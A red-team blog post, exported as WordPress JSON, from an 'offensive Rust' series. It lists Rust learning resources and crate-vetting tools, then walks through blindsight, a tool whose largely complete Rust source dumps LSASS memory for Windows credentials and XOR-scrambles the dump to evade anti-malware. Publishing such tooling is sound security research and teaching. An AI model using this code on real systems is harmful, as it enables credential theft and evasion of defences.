{"id":3576,"date":"2024-12-10T08:28:16","date_gmt":"2024-12-10T07:28:16","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=3576"},"modified":"2025-10-21T09:08:11","modified_gmt":"2025-10-21T09:08:11","slug":"an-offensive-rust-encore","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","title":{"rendered":"An offensive Rust encore"},"content":{"rendered":"<blockquote><p><em>&#8220;Give me alchemy, give me wizardry, give me sorcery, thermatology,<\/em><br \/>\n<em>Electricity, magic if you please, master all of these, bring him to his knees,<\/em><br \/>\n<em>I master five magics, I master five magics, I master five magics, I master five magics.<\/em><br \/>\n<em>&#8212; Megadeth, Five Magics (1990)<\/em><\/p><\/blockquote>\n<h3>Encore! Encore!<\/h3>\n<p>There&#8217;s so much to <a href=\"https:\/\/www.rust-lang.org\/\">Rust<\/a> and in my <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">previous article<\/a> we barely scratched the surface of this <strong>powerful yet surprisingly approachable <\/strong>programming language. Yes, you read that right. Despite <a href=\"https:\/\/vorner.github.io\/difficult.html\">its reputation<\/a> as a difficult language, from the perspective of a somewhat experienced C programmer <strong>Rust is not that hard<\/strong>. Harder than <a href=\"https:\/\/go.dev\/learn\/\">Go<\/a>, sure, but definitely easier than <a href=\"https:\/\/github.com\/federico-busato\/Modern-CPP-Programming\">C++<\/a>. 
Then again, C++ is probably the most unnecessarily complex language around&#8230; But I digress.<\/p>\n<figure id=\"attachment_5102\" aria-describedby=\"caption-attachment-5102\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-5102\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1.jpg\" alt=\"\" width=\"600\" height=\"472\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1.jpg 879w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-300x236.jpg 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-768x604.jpg 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-350x275.jpg 350w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><figcaption id=\"caption-attachment-5102\" class=\"wp-caption-text\">C++ in all its glory<\/figcaption><\/figure>\n<p>So, Rust is approachable. Yet, like most programming languages, and probably more so, Rust is hard to master. Following up on my <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">previous work<\/a>, in this article I&#8217;ll provide some additional<strong>\u00a0learning resources<\/strong> for intermediate-level rustaceans, to help you travel a little further along your learning path. I&#8217;ll also introduce <strong>a new offensive security tool<\/strong> to showcase another practical application of this programming language that regularly polls as <a href=\"https:\/\/survey.stackoverflow.co\/2024\/technology#admired-and-desired\">one of the most loved<\/a> \ud83e\udd80<\/p>\n<h3>Soundtrack and learning materials<\/h3>\n<p>Let&#8217;s hack with a soundtrack! 
For this encore, I\u2019ve selected another thrash metal anthem, once again from <strong>Megadeth\u2019s classic album &#8220;Rust in Peace&#8221;<\/strong>: <a href=\"https:\/\/en.wikipedia.org\/wiki\/Master_of_the_Five_Magics\">Five Magics<\/a> \ud83e\udd18<\/p>\n<p>As for the<strong>\u00a0learning materials<\/strong>, here&#8217;s a list of resources that should assist intermediate-level Rust developers in bringing their skills to the next level:<\/p>\n<ul>\n<li><a href=\"https:\/\/veykril.github.io\/tlborm\/\">The Little Book of Rust Macros<\/a>. On my first approach to Rust I had only skimmed over the topic of macros, but they can be the right tool for the job in a number of <a href=\"https:\/\/exercism.org\/tracks\/rust\/exercises\/space-age\/solutions\/0xdea\">scenarios<\/a>. This short book covers Rust macros with a lot of depth.<\/li>\n<li><a href=\"https:\/\/doc.rust-lang.org\/stable\/rust-by-example\/macros.html\">Rust by Example &#8211; macro_rules!<\/a> This is probably the best resource to quickly get up to speed with Rust macros, but see also the macros chapter in The Book, <a href=\"https:\/\/doc.rust-lang.org\/stable\/book\/ch19-06-macros.html\">here<\/a> and <a href=\"https:\/\/doc.rust-lang.org\/1.30.0\/book\/first-edition\/macros.html\">here<\/a> (the second link points to an outdated edition with some helpful details).<\/li>\n<li><a href=\"https:\/\/www.lurklurk.org\/effective-rust\/\">Effective Rust<\/a>. This book focuses on areas where Rust programmers tend to struggle. 
As such, it&#8217;s intended to be the <em>second<\/em> book that newcomers to Rust might need, after they have already familiarized themselves with the basics <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">elsewhere<\/a>.<\/li>\n<li><a href=\"https:\/\/rust-unofficial.github.io\/patterns\/\">Rust Design Patterns<\/a>. A comprehensive collection of idiomatic, reusable, and tested solutions to commonly occurring problems in Rust software design.<\/li>\n<li><a href=\"https:\/\/rust-lang.github.io\/api-guidelines\/\">Rust API Guidelines<\/a>. A set of recommendations on how to design and present APIs for the Rust programming language, organized as a handy checklist. See also the <a href=\"https:\/\/doc.rust-lang.org\/std\/index.html\">Rust Standard Library documentation<\/a> and the full list of <a href=\"https:\/\/rust-lang.github.io\/rust-clippy\/stable\/index.html\">clippy lints<\/a>.<\/li>\n<li><a href=\"https:\/\/docs.google.com\/drawings\/u\/0\/d\/1EOPs0YTONo_FygWbuJGPfikO9Myt5HwtiFUHRuE1JVM\/preview?pli=1\">Rust Result\/Option Transformations<\/a>. Super useful diagram that explains possible transformations between <a href=\"https:\/\/doc.rust-lang.org\/stable\/std\/result\/\">Result<\/a> and <a href=\"https:\/\/doc.rust-lang.org\/stable\/std\/option\/\">Option<\/a> standard types and their interactions.<\/li>\n<li><a href=\"https:\/\/crates.io\/crates\/cargo-generate\">Cargo Generate<\/a>. I use this developer tool to create a <a href=\"https:\/\/github.com\/0xdea\/raptor-rust-template\">dynamic template<\/a> for starting my Rust projects. Check it out along with another useful cargo subcommand plugin: <a href=\"https:\/\/crates.io\/crates\/cargo-wizard\">Cargo Wizard<\/a>.<\/li>\n<li><a href=\"https:\/\/rhai.rs\/book\/index.html\">The Rhai Book<\/a>. 
Cargo Generate made me discover Rhai, an embedded scripting language and evaluation engine for Rust that provides a safe and easy way to add scripting to any application.<\/li>\n<li><a href=\"https:\/\/exercism.org\/tracks\/rust\">Rust Track on Exercism<\/a>. A free platform that provides coding exercises and mentoring to develop fluency in your chosen programming languages. I personally found it particularly useful to practice Rust&#8217;s <a href=\"https:\/\/www.lurklurk.org\/effective-rust\/iterators.html\">functional<\/a> <a href=\"https:\/\/exercism.org\/tracks\/rust\/exercises\/isbn-verifier\/solutions\/0xdea\">programming<\/a> style.<\/li>\n<li><a href=\"https:\/\/www.zero2prod.com\/\">Zero to Production in Rust<\/a>. An introduction to web API backend development in Rust that provides good coverage of the whole language and its patterns, using a <a href=\"https:\/\/github.com\/0xdea\/zero2prod\">realistic project<\/a> as a concrete example. Highly recommended!<\/li>\n<\/ul>\n<p>That&#8217;s quite a lot of material to study in depth! Take your time&#8230;<\/p>\n<p>There&#8217;s just one last thing before we can move on to the next topic. Let&#8217;s address the <a href=\"https:\/\/patchfriday.com\/50\/\">elephant in the room<\/a>, shall we? 
Rust protects you against undefined behavior, that&#8217;s true, but it has an obvious <strong>weak spot<\/strong>.<\/p>\n<figure id=\"attachment_4001\" aria-describedby=\"caption-attachment-4001\" style=\"width: 424px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/patchfriday.com\/43\/\"><img decoding=\"async\" class=\"wp-image-4001 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1.png\" alt=\"\" width=\"424\" height=\"450\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1.png 424w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1-283x300.png 283w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1-350x371.png 350w\" sizes=\"(max-width: 424px) 100vw, 424px\" \/><\/a><figcaption id=\"caption-attachment-4001\" class=\"wp-caption-text\">Software Security &#8211; https:\/\/patchfriday.com\/43\/<\/figcaption><\/figure>\n<p>If blindly trusting a lot of <a href=\"https:\/\/blog.rust-lang.org\/inside-rust\/2023\/09\/01\/crates-io-malware-postmortem.html\">external dependencies<\/a> gives you pause, as it should, I recommend a few additional resources:<\/p>\n<ul>\n<li><a href=\"https:\/\/blessed.rs\/crates\">Blessed.rs<\/a>. An unofficial guide to the Rust ecosystem that aims to help developers choose useful crates they can trust to include in their projects.<\/li>\n<li><a href=\"https:\/\/lib.rs\/\">Lib.rs<\/a>. Another curated alternative to crates.io with a powerful search that promotes stable, regularly updated, popular crates, and hides spam, abandoned, and otherwise untrusted crates.<\/li>\n<li><a href=\"https:\/\/crates.io\/crates\/cargo-deny\">cargo-deny<\/a>. 
A popular cargo plugin for linting dependencies and managing large dependency graphs, very useful whether run on CI as a <a href=\"https:\/\/github.com\/EmbarkStudios\/cargo-deny-action\">GitHub Action<\/a>\u00a0or as a standalone tool.<\/li>\n<\/ul>\n<p>It&#8217;s now time to look at some actual code.<\/p>\n<h3>Introducing blindsight<\/h3>\n<p>This <a href=\"https:\/\/github.com\/0xdea\/blindsight\">little tool<\/a> takes its name from one of my all-time favorite <strong>hard science fiction novels<\/strong>: <a href=\"https:\/\/en.wikipedia.org\/wiki\/Blindsight_(Watts_novel)\">Blindsight by Peter Watts<\/a>. Space vampires, baby! \ud83e\ude90 \ud83e\udddb Seriously though, you should read it, you won&#8217;t be disappointed.<\/p>\n<blockquote><p><em>&#8220;There&#8217;s no such thing as survival of the fittest.<\/em><br \/>\n<em>Survival of the most adequate, maybe.<\/em><br \/>\n<em>It doesn&#8217;t matter whether a solution&#8217;s optimal.<\/em><br \/>\n<em>All that matters is whether it beats the alternative.&#8221;<\/em><br \/>\n<em>&#8212; Peter Watts, Blindsight (2006)<\/em><\/p><\/blockquote>\n<p>Coming back to our tool, the use case is quite simple. Often, during red team engagements, once first access to the target is established, the need arises to <strong>dump Windows credentials<\/strong> in Active Directory environments. There are <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\">many<\/a> <a href=\"https:\/\/www.synacktiv.com\/en\/publications\/windows-secrets-extraction-a-summary\">techniques<\/a> and <a href=\"https:\/\/github.com\/fortra\/nanodump\">tools<\/a> to do this and I wanted to challenge myself to implement one of my own.<\/p>\n<p>Let&#8217;s see it in action. 
You can <strong>download and cross-compile blindsight<\/strong> as follows (macOS example):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-linenumbers=\"false\" data-enlighter-theme=\"minimal\">raptor@fnord github % git clone https:\/\/github.com\/0xdea\/blindsight\r\nCloning into 'blindsight'...\r\n[...]\r\nraptor@fnord github % cd blindsight\r\nraptor@fnord blindsight % brew install mingw-w64\r\n[...]\r\nraptor@fnord blindsight % rustup target add x86_64-pc-windows-gnu\r\n[...]\r\nraptor@fnord blindsight % cargo build --release --target x86_64-pc-windows-gnu\r\n   Compiling proc-macro2 v1.0.86\r\n   Compiling unicode-ident v1.0.12\r\n   Compiling crossbeam-utils v0.8.20\r\n   Compiling windows_x86_64_gnu v0.52.6\r\n   Compiling winapi-x86_64-pc-windows-gnu v0.4.0\r\n   Compiling cfg-if v1.0.0\r\n   Compiling winapi v0.3.9\r\n   Compiling rayon-core v1.12.1\r\n   Compiling getrandom v0.2.15\r\n   Compiling ntapi v0.4.1\r\n   Compiling libc v0.2.155\r\n   Compiling rand_core v0.6.4\r\n   Compiling ppv-lite86 v0.2.17\r\n   Compiling either v1.13.0\r\n   Compiling memchr v2.7.4\r\n   Compiling rand_chacha v0.3.1\r\n   Compiling rand v0.8.5\r\n   Compiling quote v1.0.36\r\n   Compiling syn v2.0.71\r\n   Compiling windows-targets v0.52.6\r\n   Compiling windows-result v0.1.2\r\n   Compiling crossbeam-epoch v0.9.18\r\n   Compiling crossbeam-deque v0.8.5\r\n   Compiling rayon v1.10.0\r\n   Compiling windows-implement v0.57.0\r\n   Compiling windows-interface v0.57.0\r\n   Compiling windows-core v0.57.0\r\n   Compiling windows v0.57.0\r\n   Compiling sysinfo v0.31.4\r\n   Compiling blindsight v0.1.0 (\/Users\/raptor\/Downloads\/github\/blindsight)\r\n    Finished `release` profile [optimized] target(s) in 16.30s\r\nraptor@fnord blindsight % ls -l target\/x86_64-pc-windows-gnu\/release\/blindsight.exe\r\n-rwxr-xr-x@ 1 raptor  staff  378368 Nov  8 09:49 target\/x86_64-pc-windows-gnu\/release\/blindsight.exe*\r\nraptor@fnord blindsight 
%<\/pre>\n<p>Then, copy <strong>blindsight.exe<\/strong> to the target Windows box and run it inside an <strong>Administrator&#8217;s PowerShell window<\/strong>:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-4478 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1.png\" alt=\"\" width=\"1699\" height=\"1464\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1.png 1699w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-300x259.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-1024x882.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-768x662.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-1536x1324.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-350x302.png 350w\" sizes=\"(max-width: 1699px) 100vw, 1699px\" \/><\/p>\n<p>The tool will <strong>write a scrambled dump to disk<\/strong>, in order to prevent detection of the LSASS memory dump by some anti-malware products. There are <a href=\"https:\/\/www.ired.team\/offensive-security\/credential-access-and-credential-dumping\/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\">many possible ways<\/a> to thwart detection: I chose to simply <strong>XOR the dump<\/strong> with a hardcoded key. 
To <strong>recover the original memory dump<\/strong>, you can run blindsight.exe again on your own machine passing the scrambled dump file as input:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-4487 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1.png\" alt=\"\" width=\"1700\" height=\"779\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1.png 1700w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-300x137.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-1024x469.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-768x352.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-1536x704.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-350x160.png 350w\" sizes=\"(max-width: 1700px) 100vw, 1700px\" \/><\/p>\n<p>Finally, to <strong>retrieve the actual credentials<\/strong> you can use your favorite memory parser, such as <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">mimikatz<\/a>, <a href=\"https:\/\/github.com\/skelsec\/pypykatz\">pypykatz<\/a>, or even <a href=\"https:\/\/github.com\/volatilityfoundation\/volatility\">volatility<\/a>.<\/p>\n<h3>Code walkthrough<\/h3>\n<p>As was the case with <a href=\"https:\/\/github.com\/0xdea\/backdoo-rs\">backdoo-rs<\/a>, blindsight is <strong>little more than a toy<\/strong>&#8230; I haven&#8217;t used it during any actual engagement, &#8216;cause honestly we have better private tooling that can achieve the same goal and then some. 
Otherwise, I wouldn&#8217;t have been so quick to publish it \ud83e\udd2b<\/p>\n<figure id=\"attachment_4489\" aria-describedby=\"caption-attachment-4489\" style=\"width: 480px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-4489 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1.jpg\" alt=\"\" width=\"480\" height=\"640\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1.jpg 480w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1-225x300.jpg 225w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1-350x467.jpg 350w\" sizes=\"(max-width: 480px) 100vw, 480px\" \/><figcaption id=\"caption-attachment-4489\" class=\"wp-caption-text\">Know, and keep silent &#8211; #INFILTRATE19 badge<\/figcaption><\/figure>\n<p>Although blindsight lacks <a href=\"https:\/\/github.com\/0xdea\/blindsight\/tree\/master?tab=readme-ov-file#todo\">advanced anti-detection features<\/a>, the <strong>EDR bypass rate<\/strong> it achieved in our tests is still somewhat better than I expected. However, I wouldn&#8217;t recommend using it in a real-life scenario. Still, I believe blindsight might be useful as an <strong>easy-to-understand proof-of-concept tool<\/strong> for those who are approaching Rust with an offensive mindset.<\/p>\n<p>Let&#8217;s take a look at the code to highlight the most interesting snippets.<\/p>\n<p>The <strong>main()<\/strong> function is pretty straightforward&#8230; let&#8217;s skip directly to the more juicy bits in <a href=\"https:\/\/github.com\/0xdea\/blindsight\/blob\/master\/src\/lib.rs\">lib.rs<\/a>. 
The <strong>run()<\/strong> function simply calls either <strong>dump()<\/strong> or <strong>unscramble()<\/strong> according to the action inferred by <strong>main()<\/strong> based on the provided command line:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">\/\/\/ Dispatch to function implementing the selected action\r\npub fn run(action: &amp;str) -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    match action {\r\n        \"dump\" =&gt; dump()?,\r\n        _ =&gt; unscramble(action)?,\r\n    }\r\n\r\n    Ok(())\r\n}<\/pre>\n<p>The <strong>dump()<\/strong> function creates an <strong>output file<\/strong> with a random name (lines 3-8 below), gets the <strong>LSASS process identifier<\/strong> via a helper function (lines 10-12), and then <strong>opens the process<\/strong> (lines 14-16).<\/p>\n<p>Afterwards, a somewhat convoluted <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/fileio\/transactional-ntfs-portal\">technique<\/a> is employed to create an <strong>intermediate output file in memory<\/strong> as a transacted operation (lines 18-49) and <strong>dump LSASS memory<\/strong> to it using the classic <strong>MiniDumpWriteDump() <\/strong>Windows API function (lines 51-63). A view of this intermediate dump file is then <strong>mapped <\/strong>into the current address space (lines 65-71) and <strong>scrambled<\/strong> using a temporary vector to hold data (lines 73-83). Finally, the resulting scrambled dump is <strong>written to disk<\/strong> (lines 85-87).<\/p>\n<p>Note how there&#8217;s <a href=\"https:\/\/doc.rust-lang.org\/std\/fs\/struct.File.html\">no need to close files<\/a> in safe Rust code. Files are automatically closed when they go out of scope and errors detected on closing are ignored by default. 
Kinda weird, but that\u2019s the Rust way \ud83e\udd37<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">\/\/\/ Dump LSASS memory to scrambled output file\r\nfn dump() -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    \/\/ Create output file with a random name\r\n    let path = format!(\".\\\\{rand}.log\", rand = rand_str(8));\r\n    println!(\"[*] Trying to dump to output file: {path}\");\r\n    let path = PathBuf::from(path);\r\n    let mut out_file = File::create_new(path)?;\r\n    println!(\"[+] Successfully created output file\");\r\n\r\n    \/\/ Get LSASS pid\r\n    let pid = lsass_pid()?;\r\n    println!(\"[+] Found {LSASS} pid: {pid}\");\r\n\r\n    \/\/ Open LSASS process\r\n    let proc_handle = unsafe { OpenProcess(PROCESS_ALL_ACCESS, false, pid)? };\r\n    println!(\"[+] Successfully opened {LSASS} handle: {proc_handle:?}\");\r\n\r\n    \/\/ Create NTFS transaction object (TxF API)\r\n    let txf_handle = unsafe {\r\n        CreateTransaction(\r\n            ptr::null_mut(),\r\n            ptr::null_mut(),\r\n            0,\r\n            0,\r\n            0,\r\n            INFINITE,\r\n            PCWSTR(ptr::null_mut()),\r\n        )?\r\n    };\r\n\r\n    \/\/ Create intermediate output file as a transacted operation\r\n    let mut filename = format!(\".\\\\{rand}.log\", rand = rand_str(8));\r\n    let file_ptr = filename.as_mut_ptr();\r\n    let file_handle = unsafe {\r\n        CreateFileTransactedA(\r\n            PCSTR(file_ptr),\r\n            FILE_GENERIC_READ.0 | FILE_GENERIC_WRITE.0,\r\n            FILE_SHARE_WRITE,\r\n            None,\r\n            CREATE_NEW,\r\n            FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE,\r\n            None,\r\n            txf_handle,\r\n            Some(std::ptr::from_ref::&lt;TXFS_MINIVERSION&gt;(\r\n                &amp;TXFS_MINIVERSION_DIRTY_VIEW,\r\n            )),\r\n            None,\r\n        )?\r\n    };\r\n\r\n    \/\/ Dump LSASS 
memory to intermediate output file\r\n    unsafe {\r\n        MiniDumpWriteDump(\r\n            proc_handle,\r\n            pid,\r\n            file_handle,\r\n            MiniDumpWithFullMemory,\r\n            None,\r\n            None,\r\n            None,\r\n        )?;\r\n    };\r\n    println!(\"[+] Dump successful!\");\r\n\r\n    \/\/ Map a view of the intermediate file into our address space\r\n    let map_handle = unsafe { CreateFileMappingW(file_handle, None, PAGE_READONLY, 0, 0, None)? };\r\n    let ptr = unsafe {\r\n        MapViewOfFile(map_handle, FILE_MAP_READ, 0, 0, 0)\r\n            .Value\r\n            .cast::&lt;u8&gt;()\r\n    };\r\n\r\n    \/\/ Scramble dump using a temporary vector to hold data\r\n    let size = unsafe { GetFileSize(file_handle, None) } as usize;\r\n    let data = unsafe { slice::from_raw_parts_mut(ptr, size) };\r\n    println!(\r\n        \"[*] Scrambling dump and writing {len} bytes to disk\",\r\n        len = data.len()\r\n    );\r\n\r\n    let mut dump = vec![0u8; size];\r\n    dump.clone_from_slice(data);\r\n    scramble(&amp;mut dump, KEY);\r\n\r\n    \/\/ Write scrambled dump to output file\r\n    let count = out_file.write(&amp;dump)?;\r\n    println!(\"[+] Done writing {count} bytes to disk!\");\r\n\r\n    \/\/ Cleanup\r\n    unsafe {\r\n        CloseHandle(map_handle)?;\r\n        CloseHandle(file_handle)?;\r\n        CloseHandle(txf_handle)?;\r\n        CloseHandle(proc_handle)?;\r\n    }\r\n\r\n    Ok(())\r\n}<\/pre>\n<p>The <strong>unscramble()<\/strong> function below is responsible for <strong>reading the scrambled dump file<\/strong> passed as an input (lines 8-13), <strong>unscrambling its contents<\/strong> by reversing the <strong>xor()<\/strong> operation implemented in the <strong>scramble()<\/strong> function (lines 15-20), and finally <strong>writing the clean dump<\/strong> to the <strong>lsass.dmp<\/strong> output file (lines 22-25):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" 
data-enlighter-theme=\"minimal\">\/\/\/ Scramble a slice of bytes in place\r\nfn scramble(data: &amp;mut [u8], key: &amp;[u8]) {\r\n    xor(data, key);\r\n}\r\n\r\n\/\/\/ Unscramble a memory dump\r\nfn unscramble(path: &amp;str) -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    \/\/ Open and read input file\r\n    println!(\"[*] Trying to read from input file: {path}\");\r\n    let mut in_file = File::open(path)?;\r\n    let mut buf = Vec::&lt;u8&gt;::new();\r\n    in_file.read_to_end(&amp;mut buf)?;\r\n    println!(\"[+] Successfully read from input file\");\r\n\r\n    \/\/ Unscramble dump\r\n    println!(\r\n        \"[*] Trying to unscramble {len} bytes to output file: {DUMP}\",\r\n        len = buf.len()\r\n    );\r\n    xor(buf.as_mut_slice(), KEY);\r\n\r\n    \/\/ Write unscrambled dump to output file\r\n    let mut out_file = File::create_new(DUMP)?;\r\n    let count = out_file.write(&amp;buf)?;\r\n    println!(\"[+] Done writing {count} bytes to disk!\");\r\n\r\n    Ok(())\r\n}\r\n\r\n\/\/\/ XOR a slice of bytes with a key in place\r\nfn xor(data: &amp;mut [u8], key: &amp;[u8]) {\r\n    data.iter_mut()\r\n        .zip(key.iter().cycle())\r\n        .for_each(|(byte, key_byte)| *byte ^= key_byte);\r\n}<\/pre>\n<p>That&#8217;s all for today! Nothing too fancy, and there&#8217;s definitely plenty of room for improvement, but it&#8217;s a start. You&#8217;re more than welcome to work on it to make it better, if you&#8217;re so inclined. So, go <strong>download blindsight<\/strong> here:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/0xdea\/blindsight\">https:\/\/github.com\/0xdea\/blindsight<\/a><\/li>\n<\/ul>\n<p>Afterwards, listen to some good tracks that make you hack harder, learn some cool new Rust tricks, and stay tuned. 
In the next installment of this <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">series<\/a>, things will get more serious, as we will explore <strong>how to use Rust for vulnerability research<\/strong>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;Give me alchemy, give me wizardry, give me sorcery, thermatology, Electricity, magic if you please, master all of these, bring [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":159953,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[88,91],"tags":[207,208,134,135,191,206],"class_list":["post-3576","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tools","category-articles","tag-mimikatz","tag-minidump","tag-tactical-exploitation","tag-windows","tag-red-teaming","tag-rust"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security - An offensive Rust encore -<\/title>\n<meta name=\"description\" content=\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - An offensive Rust encore -\" \/>\n<meta property=\"og:description\" content=\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/\" 
\/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-10T07:28:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T09:08:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Marco Ivaldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marco Ivaldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"},\"author\":{\"name\":\"Marco Ivaldi\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\"},\"headline\":\"An offensive Rust 
